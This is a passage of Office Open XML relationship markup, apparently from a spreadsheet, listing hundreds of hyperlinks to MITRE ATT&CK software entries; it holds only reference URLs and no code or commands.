TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0368" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0145" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0436" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0386" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0041" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0071" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0038" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0036" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0393" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0584" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0014" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0462" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0054" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0243" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0249" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0047" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0481" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0090" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0519" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0188" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0045" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0537" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0362" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0339" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0336" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0229" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0018" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0001" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0515" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0202" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0013" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0067" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0570" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0488" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0383" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0375" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0445" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0044" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0276" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0149" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0199" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0062" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0223" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0161" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0456" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0222" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0597" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0113" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0358" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0380" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0354" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0214" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0397" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0178" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0247" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0110" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0470" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0484" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0091" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0241" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0533" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0224" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0282" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0165" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0257" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0278" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0414" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0095" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0072" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0458" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0338" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0503" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0483" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0074" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0060" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0552" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0002" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0206" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0103" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0184" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0012" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0592" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0564" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0235" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0493" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0007" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0163" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0437" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0256" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0011" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0341" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0373" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0593" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0039" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0238" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0212" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0200" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0152" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0446" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0391" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0447" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0333" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0160" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0352" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0017" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0348" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0512" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0416" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0159" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0087" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0413" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0053" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0207" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0051" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0100" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0093" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0126" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0186" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0016" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0169" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0092" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0410" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0357" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0226" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0098" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0466" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0272" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0227" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0486" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0197" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0453" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0174" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0498" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0568" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0531" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0215" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0162" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0461" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0057" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0451" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0086" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0347" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0527" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0033" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0078" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0600" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0343" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0135" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0035" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0136" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0472" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0069" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0449" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0340" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0258" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0175" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0572" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0120" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0009" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0153" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0088" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0382" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0109" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0084" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0254" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0123" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0234" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0591" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0384" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0417" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0213" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0260" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0433" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0516" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0164" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0191" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0042" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0198" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0122" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0177" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0230" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0204" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0554" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0192" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0342" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0526" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0185" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0004" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0532" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0508" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0404" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0473" TargetMode="External"/><Relationship Id="rId59" 